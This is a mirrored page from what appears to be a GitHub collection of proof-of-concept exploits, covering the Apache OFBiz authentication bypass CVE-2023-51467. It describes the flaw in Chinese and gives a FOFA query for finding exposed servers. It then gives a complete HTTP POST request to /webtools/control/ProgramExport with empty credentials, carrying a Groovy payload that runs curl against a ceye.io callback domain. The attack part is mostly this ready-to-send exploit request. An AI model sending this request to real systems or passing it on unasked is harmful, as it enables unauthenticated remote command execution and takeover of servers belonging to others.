mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
1.6 KiB
1.6 KiB
Apache OFBiz 身份验证绕过漏洞 (CVE-2023-51467)
Apache OFBiz 在后台提供了执行groovy 代码的功能,但是由于存在认证绕过问题,攻击者可构造恶意请求绕过身份认证,利用后台相关接口功能执行groovy代码,执行任意命令,控制服务器。
fofa
app="Apache_OFBiz"
poc
POST /webtools/control/ProgramExport?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 127.0.0.1:8443
Cookie: OFBiz.Visitor=10100
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://127.0.0.1:8443/accounting/control/main
Content-Type: application/x-www-form-urlencoded
Content-Length: 166
Origin: https://127.0.0.1:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
groovyProgram=import+groovy.lang.GroovyShell%0D%0A%0D%0AGroovyShell+shell+%3D+new+GroovyShell%28%29%3B%0D%0Ashell.evaluate%28%27%22curl+CVE-2023-51467.xxxxxx.ceye.io%22.execute%28%29%27%29